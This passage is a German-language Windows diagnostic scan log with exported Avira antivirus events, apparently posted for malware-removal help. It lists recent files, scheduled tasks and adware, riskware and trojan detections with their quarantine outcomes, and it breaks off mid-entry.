2016-03-30 13:11 - 2016-03-30 13:11 - 00015136 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
2016-03-30 13:08 - 2016-03-30 13:08 - 00000000 ____D C:\Users\Harun\AppData\Local\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Public\Documents\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Harun\AppData\Roaming\ffgogogo
2016-03-30 13:04 - 2016-03-30 13:04 - 00000000 ____D C:\Program Files (x86)\ffgogogo Browser
2016-03-24 21:44 - 2016-03-24 21:44 - 00000000 ____D C:\Users\Harun\AppData\Local\TeamViewer
2016-03-23 19:02 - 2016-03-23 19:02 - 00000000 ____D C:\Users\Harun\AppData\Roaming\MCorp

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 12:50 - 2015-07-29 13:31 - 01790124 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-19 12:50 - 2015-07-10 18:34 - 00771100 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-19 12:50 - 2015-07-10 18:34 - 00153964 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-19 12:50 - 2015-07-10 13:02 - 00000000 ____D C:\WINDOWS\INF
2016-04-19 12:45 - 2015-07-31 18:06 - 00002306 _____ C:\WINDOWS\System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD}
2016-04-19 12:45 - 2015-07-31 18:05 - 00002306 _____ C:\WINDOWS\System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B}
2016-04-19 12:45 - 2015-07-29 12:41 - 00003648 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-19 12:45 - 2015-07-29 12:41 - 00003424 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-19 12:45 - 2015-07-29 12:41 - 00001136 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-19 12:45 - 2015-07-29 12:41 - 00001132 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-19 12:44 - 2015-07-10 14:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-19 12:43 - 2015-08-01 18:48 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-04-19 12:43 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-19 12:43 - 2015-07-10 11:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-19 12:39 - 2015-09-16 17:58 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-19 12:38 - 2015-09-16 17:58 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-19 12:37 - 2015-07-29 14:04 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{72B71363-67D7-4D80-A0FC-60FE645FEBE1}
2016-04-19 12:37 - 2015-07-10 13:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-19 12:34 - 2016-02-02 15:15 - 00000000 ___RD C:\Users\Harun\OneDrive
2016-04-19 12:34 - 2015-07-29 13:30 - 00002429 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-17 16:13 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\rescache
2016-04-16 23:50 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Battle.net
2016-04-16 20:48 - 2015-09-24 15:09 - 00000000 ____D C:\Users\Harun\AppData\Roaming\.minecraft
2016-04-16 18:30 - 2015-07-29 13:28 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-16 18:15 - 2015-09-23 16:25 - 00000000 ____D C:\Users\faruk
2016-04-16 18:15 - 2015-07-29 14:58 - 00000000 ____D C:\Users\aysec
2016-04-16 18:15 - 2015-07-29 13:24 - 00000000 ____D C:\Users\Harun
2016-04-16 18:13 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-16 17:24 - 2016-02-03 10:50 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Audacity
2016-04-16 15:48 - 2015-07-10 12:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-16 12:41 - 2015-07-29 16:33 - 00000000 ____D C:\Users\Harun\AppData\Local\Spotify
2016-04-16 12:41 - 2015-07-29 16:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Spotify
2016-04-15 18:02 - 2015-08-14 19:28 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-15 18:00 - 2015-08-14 19:28 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-15 17:58 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
2016-04-15 16:59 - 2015-07-29 13:28 - 00000000 ____D C:\Users\Harun\AppData\Local\Packages
2016-04-11 23:31 - 2016-03-08 16:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-11 23:28 - 2015-08-01 22:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-11 20:21 - 2016-02-27 14:24 - 00000000 ____D C:\Program Files (x86)\Minecraft
2016-04-11 20:21 - 2016-02-02 19:29 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sony
2016-04-11 20:21 - 2015-07-30 19:07 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Skype
2016-04-11 20:21 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-11 13:22 - 2015-10-22 16:22 - 00000000 ____D C:\Users\Harun\AppData\Local\AMD
2016-04-10 22:05 - 2015-08-01 19:13 - 00000000 ____D C:\Program Files (x86)\AMD
2016-04-10 22:05 - 2015-08-01 18:48 - 00000000 ____D C:\Program Files\AMD
2016-04-10 21:58 - 2015-07-10 14:20 - 00234560 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-10 21:56 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-04-10 17:32 - 2015-07-30 15:07 - 00000000 ____D C:\ProgramData\TuneUp Software
2016-04-09 20:13 - 2015-09-29 16:26 - 00000000 ____D C:\Users\Harun\Desktop\Minecraft
2016-04-07 22:37 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Battle.net
2016-04-07 22:37 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-06 20:32 - 2015-07-10 13:06 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-07-10 13:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-05 09:45 - 2015-08-09 07:13 - 07466024 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9108.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00162784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CFC.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00143600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA81C.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 09618784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET84BF.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00130616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CDB.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA80A.tmp
2016-04-05 09:43 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9C84.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 09675944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9635.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 01265208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9F16.tmp
2016-04-05 09:39 - 2015-08-01 18:47 - 00685584 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\SET9CC9.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00451088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET85B6.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00151056 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA82E.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 01285136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET8512.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 00953360 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\SET91F9.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 40135696 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SETA7D7.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 21739024 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SET9BA2.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08929400 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET8401.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08669624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET91B6.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 11735800 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET906A.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 01539560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9D3E.tmp
2016-04-04 06:16 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00152568 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00133528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 09526616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08843208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08585696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 07392480 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00120656 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 11625784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 09583808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01517360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01245416 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2016-04-04 06:09 - 2015-08-01 18:47 - 26345472 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2016-04-04 05:23 - 2015-08-09 07:10 - 40126976 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2016-04-04 05:15 - 2015-08-09 07:10 - 21730304 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2016-04-04 03:57 - 2015-08-09 07:10 - 00442368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2016-04-04 03:33 - 2015-08-09 07:10 - 01276416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00142336 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2016-04-04 03:31 - 2015-08-01 18:47 - 00676864 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2016-04-02 17:01 - 2015-11-21 15:21 - 00000000 ___RD C:\Users\Harun\Desktop\NVU (YAVUZ)
2016-03-30 13:13 - 2015-08-01 22:54 - 00001983 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-03-30 11:10 - 2015-11-07 20:53 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ____D C:\ProgramData\Skype
2016-03-23 11:12 - 2016-03-08 16:35 - 00060136 ____N (DotC United Inc) C:\WINDOWS\system32\Drivers\MPCKpt.sys

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-03-30 20:14 - 2016-03-30 20:14 - 0000000 _____ () C:\Users\Harun\AppData\Roaming\dc.ogt
2016-01-12 18:41 - 2016-01-19 16:52 - 0000600 _____ () C:\Users\Harun\AppData\Roaming\winscp.rnd
2016-01-13 15:38 - 2016-01-19 16:53 - 0000600 _____ () C:\Users\Harun\AppData\Local\PUTTY.RND
2015-07-30 15:17 - 2015-07-30 15:17 - 0007605 _____ () C:\Users\Harun\AppData\Local\Resmon.ResmonCfg
2015-07-29 13:50 - 2015-07-29 13:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\aysec\AppData\Local\Temp\avgnt.exe
C:\Users\faruk\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\libeay32.dll
C:\Users\Harun\AppData\Local\Temp\msvcr120.dll
C:\Users\Harun\AppData\Local\Temp\playstv_patch.exe
C:\Users\Harun\AppData\Local\Temp\radeon-crimson-16.3.2-minimalsetup.exe
C:\Users\Harun\AppData\Local\Temp\raptrpatch.exe
C:\Users\Harun\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-09 09:50

==================== Ende von FRST.txt ============================
Avira Ereignisse:
Code:
Exportierte Ereignisse:

15.04.2016 17:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

15.04.2016 17:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

15.04.2016 17:00 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

15.04.2016 16:59 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

15.04.2016 16:58 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

15.04.2016 16:58 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei
      'C:\$Recycle.Bin\S-1-5-21-2630849102-760198568-3561441068-1000\$RE3IE52.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '1ccf1fa6.qua'
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei
      'C:\$Recycle.Bin\S-1-5-21-2630849102-760198568-3561441068-1000\$RDKZ3OP.zip'
      enthält folgendes Muster 'TR/Crypt.ZPACK.232887' [trojan]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '7043527c.qua'
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei
      'C:\$Recycle.Bin\S-1-5-21-2630849102-760198568-3561441068-1000\$R05MU5K.zip'
      enthält folgendes Muster 'TR/Crypt.ZPACK.232887' [trojan]
      Ausgeführte Aktion(en):
      Der Fund wurde als verdächtig eingestuft.
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '505b47cd.qua'
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchesToYesbnd\Winsere.exe'
      enthält folgendes Muster 'Adware/ELEX.aetw' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '74b26b14.qua'
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\ProgramData\1cb4ac83-5b77-0\1cb4ac83-5b77-0.d'
      enthält folgendes Muster 'Adware/Adposhel.onqd' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files
      (x86)\1CD27080-1457447150-11D9-9D7D-BCAEC571BF31\vnswFFBC.tmp'
      enthält folgendes Muster 'Adware/AgentCV.A.45541' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '3afd1afa.qua'
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\DailyPcClean Support\DailyPCClean.exe'
      enthält folgendes Muster 'PUA/SpeedUpMyPC.D' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '41d31dc5.qua'
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\ProgramData\1cb4ac83-6a03-1\1cb4ac83-6a03-1.d'
      enthält folgendes Muster 'Adware/Adposhel.onqd' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\bvxvcxxvaf\pbqrmvbub'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\nscDEC4.tmp'
      enthält folgendes Muster 'Adware/AgentCV.A.45541' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\nsr6A9C.tmp'
      enthält folgendes Muster 'Adware/ConvertAd.253440.13' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34014285.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34018266.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34018356.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34019388.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\3II5IYGRR6\win.exe'
      enthält folgendes Muster 'Adware/EoRezo.ldor' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\56MRX9MQV\56MRX9MQV.exe'
      enthält folgendes Muster 'ADWARE/PullUpdate.Gen7' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:21 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\X3HRJY7Q9\X3HRJY7Q9.exe'
      enthält folgendes Muster 'TR/Taranis.2691' [trojan]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:21 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\XJWS92VRW\XJWS92VRW.exe'
      enthält folgendes Muster 'TR/Taranis.2691' [trojan]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 20:49 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\istAAD0.tmp\qksee.exe'
      enthält folgendes Muster 'Adware/ELEX.xwll' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '51cc3403.qua'
      verschoben!

10.04.2016 20:46 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\676367343\ic-0.7552d281d18108.exe'
      enthält folgendes Muster 'Adware/ConvertAd.878154' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '502c0d45.qua'
      verschoben!

10.04.2016 20:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.xwll [adware]'
      in Datei 'C:\Users\Harun\AppData\Local\Temp\istAAD0.tmp\qksee.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ConvertAd.878154 [adware]'
